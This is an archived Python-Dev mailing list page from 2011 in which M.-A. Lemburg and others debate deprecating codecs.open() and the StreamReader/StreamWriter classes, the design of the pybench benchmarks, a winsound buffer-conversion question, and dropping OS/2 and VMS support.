   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-27 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le vendredi 27 mai 2011 15:42:10, M.-A. Lemburg a écrit :
 If we'd go by your reasoning for deprecating and eventually
 removing parts of the stdlib or Python's subsystems, we'll end
 up with a barebone version of Python. That's not what we want
 and it's not what our users want.
 
 I don't want to deprecate the whole stdlib, just duplicate old API, to follow 
 import this mantra:
 
 There should be one-- and preferably only one --obvious way to do it.

What people tend to miss in this mantra is the last part: obvious.
It doesn't say: there should only be one way to do it. There can
be many ways, but there should preferably be only one *obvious* way.

Using codec.open() is not obvious in Python3, since the standard
open() already provides a way to access an encoded stream. Using
a builtin is the obvious way to go.

It is obvious in Python2 where the standard open() doesn't provide a
way to define an encoding, so the user has to explicitly look for this
kind of API and then find it in the obvious (to some extent)
codecs module, since that's where encodings happen in Python2.

Having multiple ways to do things, is the most natural thing
on earth and it's good that way.

Python does not and should not force people into doing things
in one dictated right way. It should, however, provide
natural choices and obvious hints to find a good solution.
And that's what the Zen mantra is all about.

 It's difficult for an user to choose between between open() and codecs.open().

As I mentioned on the ticket and in my replies: I'm not against
changing codecs.open() to use a variant that is based on TextIOWrapper,
provided there are no user noticeable compatibility issues.

Thanks for reverting the patch.

Have a nice weekend,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 27 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-05-23: Released eGenix mx Base 3.2.0  http://python.egenix.com/
2011-05-25: Released mxODBC 3.1.1  http://python.egenix.com/
2011-06-20: EuroPython 2011, Florence, Italy   24 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-25 Thread M.-A. Lemburg
Walter Dörwald wrote:
 On 24.05.11 12:58, Victor Stinner wrote:
 Le mardi 24 mai 2011 à 12:42 +0200, Łukasz Langa a écrit :
 Wiadomość napisana przez Walter Dörwald w dniu 2011-05-24, o godz. 12:16:

 I don't see which usecase is not covered by TextIOWrapper. But I know
 some cases which are not supported by StreamReader/StreamWriter.

 This could be be partially fixed by implementing generic
 StreamReader/StreamWriter classes that reuse the incremental codecs, but
 I don't think thats worth it.

 Why not?

 We have already an implementation of this idea, it is called
 io.TextIOWrapper.
 
 Exactly.
 
 From another post by Victor:
 
 As I wrote, codecs.open() is useful in Python 2. But I don't know any
 program or library using directly StreamReader or StreamWriter.
 
 So: implementing this is a lot of work, duplicates existing
 functionality and is mostly unused.

You are missing the point: we have StreamReader and StreamWriter APIs
on codecs to allow each codecs to implement more efficient ways of
encoding and decoding streams.

Examples of such optimizations are reading the stream in
chunks that can be decoded in one piece, or writing to the stream
in a way that doesn't generate encoding state problems on the
receiving end by ending transmission half-way through a
shift block.

Of course, you won't find many direct uses of these APIs, since
most of the time, applications will simply use codecs.open() to
automatically benefit from these optimizations.

OTOH, TextIOWrapper doesn't know anything about specific encodings
and thus does not allow for such optimizations to be implemented
by codecs.

We don't have many such specialized implementations in the stdlib,
but this doesn't mean that there's no use for them. It
just means that developers and users are simply unaware of the
possibilities opened by these stateful stream APIs.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 25 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-05-23: Released eGenix mx Base 3.2.0  http://python.egenix.com/
2011-05-25: Released mxODBC 3.1.1  http://python.egenix.com/
2011-06-20: EuroPython 2011, Florence, Italy   26 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-25 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le mercredi 25 mai 2011 à 11:38 +0200, M.-A. Lemburg a écrit :
 You are missing the point: we have StreamReader and StreamWriter APIs
 on codecs to allow each codecs to implement more efficient ways of
 encoding and decoding streams.

 Examples of such optimizations are reading the stream in
 chunks that can be decoded in one piece, or writing to the stream
 in a way that doesn't generate encoding state problems on the
 receiving end by ending transmission half-way through a
 shift block.

 ...

 We don't have many such specialized implementations in the stdlib,
 but this doesn't mean that there's no use for them. It
 just means that developers and users are simply unaware of the
 possibilities opened by these stateful stream APIs.
 
 Does at least one codec implement such implementation in its
 StreamReader or StreamWriter class? And can't we implement such
 optimization in incremental encoders and decoders (or in TextIOWrapper)?

I don't see how, since you need control over the file API methods
in order to implement such optimizations. OTOH, adding lots of
special cases to TextIOWrapper isn't a good either, since these
optimizations would then only trigger for a small number of
codecs and completely leave out 3rd party codecs.

 I checked all multibyte codecs (UTF and CJK codecs) and I don't see any
 of such optimization. UTF codecs handle the BOM, but don't have anything
 looking like an optimization. CJK codecs use multibytecodec,
 MultibyteStreamReader and MultibyteStreamWriter, which don't look to be
 optimized. But I missed maybe something?

No, you haven't missed such per-codec optimizations. The base classes
implement general purpose support for reading from streams in
chunks, but the support isn't optimized per codec.

For UTF-16 it would e.g. make sense to always read data in blocks
with even sizes, removing the trial-and-error decoding and extra
buffering currently done by the base classes. For UTF-32, the
blocks should have size % 4 == 0.

For UTF-8 (and other variable length encodings) it would make
sense looking at the end of the (bytes) data read from the
stream to see whether a complete code point was read or not,
rather than simply running the decoder on the complete data
set, only to find that a few bytes at the end are missing.

For single character encodings, it would make sense to prefetch
data in big chunks and skip all the trial and error decoding
implemented by the base classes to address the above problem
with variable length encodings.

Finally, all this could be implemented in C, reducing the
Python call overhead dramatically.

 TextIOWrapper has an advanced buffer algorithm to prefetch (readahead)
 some bytes at each read to speed up small read. It is difficult to
 implement such algorithm, but it's done and it works.
 
 --
 
 Ok, let's stop to speak about theorical optimizations, and let's do a
 benchmark to compare codecs and the io modules on reading files!

That's somewhat unfair: TextIOWrapper is implemented in C,
whereas the StreamReader/Writer subclasses used by the
codecs are written in Python.

A fair comparison would use the Python implementation of
TextIOWrapper.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 25 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-05-23: Released eGenix mx Base 3.2.0  http://python.egenix.com/
2011-05-25: Released mxODBC 3.1.1  http://python.egenix.com/
2011-06-20: EuroPython 2011, Florence, Italy   26 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-24 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 In Python 2, codecs.open() is the best way to read and/or write files
 using Unicode. But in Python 3, open() is preferred with its fast io
 module. I would like to deprecate codecs.open() because it can be
 replaced by open() and io.TextIOWrapper. I would like your opinion and
 that's why I'm writing this email.

I think you should have moved this part of your email
further up, since it explains the reason why this idea was
rejected for now:

 I opened an issue for this idea. Brett and Marc-Andree Lemburg don't
 want to deprecate codecs.open()  friends because they want to be able
 to write code working on Python 2 and on Python 3 without any change. I
 don't think it's realistic: nontrivial programs require at least the six
 module, and most likely the 2to3 program. The six module can have its
 codecs.open function if codecs.open is removed from Python 3.4.

And now for something completely different:

 codecs.open() and StreamReader, StreamWriter and StreamReaderWriter
 classes of the codecs module don't support universal newlines, still
 have some issues with stateful codecs (like UTF-16/32 BOMs), and each
 codec has to implement a StreamReader and a StreamWriter class.
 
 StreamReader and StreamWriter are stateless codecs (no reset() or
 setstate() method), and so it's not possible to write a generic fix for
 all child classes in the codecs module. Each stateful codec has to
 handle special cases like seek() problems. For example, UTF-16 codec
 duplicates some IncrementalEncoder/IncrementalDecoder code into its
 StreamWriter/StreamReader class.

Please read PEP 100 regarding StreamReader and StreamWriter.
Those codecs parts were explicitly designed to be stateful,
unlike the stateless encoder/decoder methods.

Please read my reply on the ticket:


StreamReader and StreamWriter classes provide the base codec
implementations for stateful interaction with streams. They
define the interface and provide a working implementation for
those codecs that choose not to implement their own variants.

Each codec can, however, implement variants which are optimized
for the specific encoding or intercept certain stream methods
to add functionality or improve the encoding/decoding
performance.

Both are essential parts of the codec interface.

TextIOWrapper and StreamReaderWriter are merely wrappers
around streams that make use of the codecs. They don't
provide any codec logic themselves. That's the conceptual
difference.


 The io module is well tested, supports non-seekable streams, handles
 correctly corner-cases (like UTF-16/32 BOMs) and supports any kind of
 newlines including an universal newline mode. TextIOWrapper reuses
 incremental encoders and decoders, so BOM issues were fixed only once,
 in TextIOWrapper.
 
 It's trivial to replace a call to codecs.open() by a call to open(),
 because the two API are very close. The main different is that
 codecs.open() doesn't support universal newline, so you have to use
 open(..., newline='') to keep the same behaviour (keep newlines
 unchanged). This task can be done by 2to3. But I suppose that most
 people will be happy with the universal newline mode.
 
 I don't see which usecase is not covered by TextIOWrapper. But I know
 some cases which are not supported by StreamReader/StreamWriter.

This is a misunderstanding of the concepts behind the two.

StreamReader and StreamWriters are implemented by the codecs,
they are part of the API that each codec has to provide in order
to register in the Python codecs system. Their purpose is
to provide a stateful interface and work efficiently and
directly on streams rather than buffers.

Here's my reply from the ticket regarding using incremental
encoders/decoders for the StreamReader/Writer parts of the
codec set of APIs:


The point about having them use incremental codecs for encoding and decoding is 
a good one and would
need to be investigated. If possible, we could use incremental 
encoders/decoders for the standard
StreamReader/Writer base classes or add new IncrementalStreamReader/Writer 
classes which then use
the IncrementalEncode/Decoder per default.

Please open a new ticket for this.


 StreamReader, StreamWriter, StreamReaderEncoder and EncodedFile are not
 used in the Python 3 standard library. I tried removed them: except
 tests of test_codecs which test them directly, the full test suite pass.

 Read the issue for more information: http://bugs.python.org/issue8796

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 24 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   27 days to go

::: Try our new mxODBC.Connect Python Database Interface 

Re: [Python-Dev] Deprecate codecs.open() and StreamWriter/StreamReader

2011-05-24 Thread M.-A. Lemburg
Victor Stinner wrote:
 Le mardi 24 mai 2011 à 10:03 +0200, M.-A. Lemburg a écrit :
 Please read PEP 100 regarding StreamReader and StreamWriter.
 Those codecs parts were explicitly designed to be stateful,
 unlike the stateless encoder/decoder methods.
 
 Yes, it is possible to implement stateful StreamReader and StreamWriter
 classes and we have such codecs (I gave the example of UTF-16), but the
 state is not exposed (getstate / setstate), and so it's not possible to
 write generic code to handle the codec state in the base StreamReader
 and StreamWriter classes. io.TextIOWrapper requires encoder.setstate(0)
 for example.

So instead of always suggesting to deprecate everything,
how about you come up with a proposal to add meaningful
new methods to those base classes ?

 Each codec can, however, implement variants which are optimized
 for the specific encoding or intercept certain stream methods
 to add functionality or improve the encoding/decoding
 performance.
 
 Can you give me some examples?

See the UTF-16 codec in the stdlib for example. This uses
some of the available possibilities to interpret the BOM mark
and then switches the encoder/decoder methods accordingly.

A lot more could be done for other variable length encoding
codecs, e.g. UTF-8, since these often have problems near
the end of a read due to missing bytes.

The base class implementation provides a general purpose
implementation to cover the case, but it's not efficient,
since it doesn't know anything about the encoding
characteristics.

Such an implementation would have to be done per codec
and that's why we have per codec StreamReader/Writer
APIs.

 TextIOWrapper and StreamReaderWriter are merely wrappers
 around streams that make use of the codecs. They don't
 provide any codec logic themselves. That's the conceptual
 difference.
 ...
 StreamReader and StreamWriters ... work efficiently and
 directly on streams rather than buffers.
 
 StreamReader, StreamWriter, TextIOWrapper and StreamReaderWriter all
 have a file-like API: tell(), seek(), read(),  readline(), write(), etc.
 The implementation is maybe different, but the API is just the same, and
 so the usecases are just the same.
 
 I don't see in which case I should use StreamReader or StreamWriter
 instead TextIOWrapper. I thought that TextIOWrapper is specific to files
 on disk, but TextIOWrapper is already used for other usages like
 sockets.

I have no idea why TextIOWrapper was added to the stdlib
instead of making StreamReaderWriter more capable,
since StreamReaderWriter had already been available in Python
since Python 1.6 (and this is being used by codecs.open()).

Perhaps we should deprecate TextIOWrapper instead and
replace it with codecs.StreamReaderWriter ? ;-)

Seriously, I don't see use of TextIOWrapper as an argument
for removing StreamReader/Writer parts of the codecs API.

 Here's my reply from the ticket regarding using incremental
 encoders/decoders for the StreamReader/Writer parts of the
 codec set of APIs:

 
 The point about having them use incremental codecs for encoding and
 decoding is a good one and would
 need to be investigated. If possible, we could use incremental
 encoders/decoders for the standard
 StreamReader/Writer base classes or add new
 IncrementalStreamReader/Writer classes which then use
 the IncrementalEncode/Decoder per default.
 
 Why do you want to write a duplicate feature? TextIOWrapper is already
 here, it's working and widely used.

See above and please also try to understand why we have per-codec
implementations for streams. I'm tired of repeating myself.

I would much prefer to see the codec-specific functionality
in TextIOWrapper added back to the codecs where it
belongs.

 I am working on codec issues (like CJK encodings, see #12100, #12057,
 #12016) and I would like to remove StreamReader and StreamWriter to have
 *less* code to maintain.

 If you want to add more code, will be available to maintain it? It looks
 like you are busy, some people (not me ;-)) are still
 waiting .transform()/.untransform()!

I dropped the ball on the idea after the strong wave of
comments against those methods. People will simply have
to use codecs.encode() and codecs.decode().

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 24 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   27 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com

Re: [Python-Dev] [Python-checkins] cpython (3.2): Avoid codec spelling issues by just using the utf-8 default.

2011-05-05 Thread M.-A. Lemburg
Raymond Hettinger wrote:
 
 On May 5, 2011, at 11:41 AM, Benjamin Peterson wrote:
 
 2011/5/5 raymond.hettinger python-check...@python.org:
 http://hg.python.org/cpython/rev/1a56775c6e54
 changeset:   69857:1a56775c6e54
 branch:  3.2
 parent:  69855:97a4855202b8
 user:Raymond Hettinger pyt...@rcn.com
 date:Thu May 05 11:35:50 2011 -0700
 summary:
  Avoid codec spelling issues by just using the utf-8 default.

 Out of curiosity, what is the issue?
 
 IIRC, the performance depended on how your spelled-it.
 I believe that is why the spelling got changed in Py3.3.

Not really. It got changed because we have canonical names
for the codecs which the stdlib should use rather than
rely on aliases. Performance-wise it only makes a difference
if you use it in tight loops.

 Either way, the code is simpler by just using the default.

... as long as the casual reader knows what the default it :-)

I think it's better to make the choice explicit, if the code
relies on a particular non-ASCII encoding. If it doesn't,
than the default is fine.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 06 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   45 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Convert Py_Buffer to Py_UNICODE

2011-05-02 Thread M.-A. Lemburg
Sijin Joseph wrote:
 Hi - I am working on a patch where I have an argument that can either be a
 unicode string or binary data, I parse the argument using the
 PyArg_ParseTuple method using the s* format specification and get a
 Py_Buffer.
 
 I now need to convert this Py_Buffer object to a Py_Unicode and pass it into
 a function. What is the best way to do this? If I determine that the passed
 argument was binary using another flag parameter then I am passing
 Py_Buffer-buf as a pointer to the start of the data.

I don't understand why you'd want to convert PyUnicode to PyBytes
(encoded as UTF-8), only to decode it again afterwards in order
to pass it to some other PyUnicode API.

It'd be more efficient to use the O parser marker and then
use PyObject_GetBuffer() to convert non-PyUnicode objects to
a Py_buffer.

 This is in winsound module, here's the relevant code snippet
 
 sound_playsound(PyObject *s, PyObject *args)
 {
 Py_buffer *buffer;
 int flags;
 int ok;
 LPCWSTR pszSound;
 
 if (PyArg_ParseTuple(args, s*i:PlaySound, buffer, flags)) {
 if (flags  SND_ASYNC  flags  SND_MEMORY) {
 /* Sidestep reference counting headache; unfortunately this also
prevent SND_LOOP from memory. */
 PyBuffer_Release(buffer);
 PyErr_SetString(PyExc_RuntimeError, Cannot play asynchronously
 from memory);
 return NULL;
 }
 
 if(flags  SND_MEMORY) {
 pszSound = buffer-buf;
 }
 else {
 /* pszSound = ; */
 }
 
 -- Sijin
 
 
 
 
 ___
 Python-Dev mailing list
 Python-Dev@python.org
 http://mail.python.org/mailman/listinfo/python-dev
 Unsubscribe: 
 http://mail.python.org/mailman/options/python-dev/mal%40egenix.com

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, May 02 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   49 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Proposal for a common benchmark suite

2011-04-29 Thread M.-A. Lemburg
Mark Shannon wrote:
 Maciej Fijalkowski wrote:
 On Thu, Apr 28, 2011 at 11:10 PM, Stefan Behnel stefan...@behnel.de
 wrote:
 M.-A. Lemburg, 28.04.2011 22:23:
 Stefan Behnel wrote:
 DasIch, 28.04.2011 20:55:
 the CPython
 benchmarks have an extensive set of microbenchmarks in the pybench
 package
 Try not to care too much about pybench. There is some value in it, but
 some of its microbenchmarks are also tied to CPython's interpreter
 behaviour. For example, the benchmarks for literals can easily be
 considered dead code by other Python implementations so that they may
 end up optimising the benchmarked code away completely, or at least
 partially. That makes a comparison of the results somewhat pointless.
 The point of the micro benchmarks in pybench is to be able to compare
 them one-by-one, not by looking at the sum of the tests.

 If one implementation optimizes away some parts, then the comparison
 will show this fact very clearly - and that's the whole point.

 Taking the sum of the micro benchmarks only has some meaning
 as very rough indicator of improvement. That's why I wrote pybench:
 to get a better, more details picture of what's happening,
 rather than trying to find some way of measuring average
 use.

 This average is very different depending on where you look:
 for some applications method calls may be very important,
 for others, arithmetic operations, and yet others may have more
 need for fast attribute lookup.
 I wasn't talking about averages or sums, and I also wasn't trying
 to put
 down pybench in general. As it stands, it makes sense as a benchmark for
 CPython.

 However, I'm arguing that a substantial part of it does not make
 sense as a
 benchmark for PyPy and others. With Cython, I couldn't get some of the
 literal arithmetic benchmarks to run at all. The runner script simply
 bails
 out with an error when the benchmarks accidentally run faster than the
 initial empty loop. I imagine that PyPy would eventually even drop
 the loop
 itself, thus leaving nothing to compare. Does that tell us that PyPy is
 faster than Cython for arithmetic? I don't think it does.

 When I see that a benchmark shows that one implementation runs in
 100% less
 time than another, I simply go *shrug* and look for a better
 benchmark to
 compare the two.

 I second here what Stefan says. This sort of benchmarks might be
 useful for CPython, but they're not particularly useful for PyPy or
 for comparisons (or any other implementation which tries harder to
 optimize stuff away). For example a method call in PyPy would be
 inlined and completely removed if method is empty, which does not
 measure method call overhead at all. That's why we settled on
 medium-to-large examples where it's more of an average of possible
 scenarios than just one.
 
 If CPython were to start incorporating any specialising optimisations,
 pybench wouldn't be much use for CPython.
 The Unladen Swallow folks didn't like pybench as a benchmark.

This is all true, but I think there's a general misunderstanding
of what pybench is.

I wrote pybench in 1997 when I was working on optimizing the
Python 1.5 implementation for use in an web application server.

At the time, we had pystone and that was a really poor benchmark
for determining of whether certain optimizations in the Python VM
and compiler made sense or not.

pybench was then improved and extended over the course of
several years and then added to Python 2.5 in 2006.

The benchmark is written as framework for micro benchmarks
based on the assumption of a non-optimizing (byte code)
compiler.

As such it may or may not work with an optimizing compiler.
The calibration part would likely have to be disabled for
an optimizing compiler (run with -C 0) and a new set of
benchmark tests would have to be added; one which tests
the Python implementation at a higher level than the
existing tests.

That last part is something people tend to forget: pybench
is not a monolithic application with a predefined and
fixed set of tests. It's a framework that can be extended
as needed.

All you have to do is add a new module with test classes
and import it in Setup.py.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   52 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python

Re: [Python-Dev] Proposal for a common benchmark suite

2011-04-29 Thread M.-A. Lemburg
DasIch wrote:
 Given those facts I think including pybench is a mistake. It does not
 allow for a fair or meaningful comparison between implementations
 which is one of the things the suite is supposed to be used for in the
 future.
 
 This easily leads to misinterpretation of the results from this
 particular benchmark and it negatively affects the performance data as
 a whole.
 
 The same applies to several Unladen Swallow microbenchmarks such as
 bm_call_method_*, bm_call_simple and bm_unpack_sequence.

I don't think we should exclude any implementation specific
benchmarks from a common suite.

They will not necessarily allow for comparisons between
implementations, but will provide important information
about the progress made in optimizing a particular
implementation.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   52 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Proposal for a common benchmark suite

2011-04-28 Thread M.-A. Lemburg
Stefan Behnel wrote:
 DasIch, 28.04.2011 20:55:
 the CPython
 benchmarks have an extensive set of microbenchmarks in the pybench
 package
 
 Try not to care too much about pybench. There is some value in it, but
 some of its microbenchmarks are also tied to CPython's interpreter
 behaviour. For example, the benchmarks for literals can easily be
 considered dead code by other Python implementations so that they may
 end up optimising the benchmarked code away completely, or at least
 partially. That makes a comparison of the results somewhat pointless.

The point of the micro benchmarks in pybench is to be able to compare
them one-by-one, not by looking at the sum of the tests.

If one implementation optimizes away some parts, then the comparison
will show this fact very clearly - and that's the whole point.

Taking the sum of the micro benchmarks only has some meaning
as very rough indicator of improvement. That's why I wrote pybench:
to get a better, more details picture of what's happening,
rather than trying to find some way of measuring average
use.

This average is very different depending on where you look:
for some applications method calls may be very important,
for others, arithmetic operations, and yet others may have more
need for fast attribute lookup.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 28 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-06-20: EuroPython 2011, Florence, Italy   53 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Drop OS/2 and VMS support?

2011-04-19 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 I asked one year ago if we should drop OS/2 support: Andrew MacIntyre,
 our OS/2 maintainer, answered:
 http://mail.python.org/pipermail/python-dev/2010-April/099477.html
 
 Extract:  The 3.x branch needs quite a bit of work on OS/2 to 
 deal with Unicode, as OS/2 was one of the earlier OSes with full 
 multiple language support and IBM developed a unique API.  I'm still 
 struggling to come to terms with this, partly because I myself don't 
 need it. 
 
 So one year later, Python 3 does still not support OS/2.
 
 --
 
 About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if
 Python 3 does work on VMS. I bet that it does just not compile :-)
 
 I don't know anyone using VMS or OS/2.
 
 --
 
 There are 39 #ifdef VMS and 52 #ifdef OS2. We can keep them and wait
 until someone work on these OSes to ensure that the test suite pass. But
 if nobody cares of these OSes and nobody wants to maintain them, it
 would be easier for the maintenance of the Python source code base to
 remove specific code.
 
 Well, not remove directly, but plan to remove it using the PEP 11
 procedure (mark OS/2 and VMS as unsupported, and remove the code in
 Python 3.4).

The Python core team is not really representative of the Python
community users, so I think this needs a different approach:

Instead of simply deprecating OSes without notice to the general
Python community, how about doing a call for support for these
OSes ?

If that doesn't turn up maintainers, then we can take the PEP 11
route.

FWIW: There's still a fan-base out there for OS/2 and its successor
eComStation:

http://en.wikipedia.org/wiki/EComStation
http://www.ecomstation.com/ecomstation20.phtml
http://www.warpstock.eu/

Same for VMS in form of OpenVMS:

http://en.wikipedia.org/wiki/OpenVMS
http://h71000.www7.hp.com/index.html?jumpid=/go/openvms
http://www.vmspython.org/

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Apr 19 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Drop OS/2 and VMS support?

2011-04-19 Thread M.-A. Lemburg
Doug Hellmann wrote:
 
 On Apr 19, 2011, at 10:36 AM, M.-A. Lemburg wrote:
 
 Victor Stinner wrote:
 Hi,

 I asked one year ago if we should drop OS/2 support: Andrew MacIntyre,
 our OS/2 maintainer, answered:
 http://mail.python.org/pipermail/python-dev/2010-April/099477.html

 Extract:  The 3.x branch needs quite a bit of work on OS/2 to 
 deal with Unicode, as OS/2 was one of the earlier OSes with full 
 multiple language support and IBM developed a unique API.  I'm still 
 struggling to come to terms with this, partly because I myself don't 
 need it. 

 So one year later, Python 3 does still not support OS/2.

 --

 About VMS: I don't know if anyone is using Python (2 or 3) on VMS, or if
 Python 3 does work on VMS. I bet that it does just not compile :-)

 I don't know anyone using VMS or OS/2.

 --

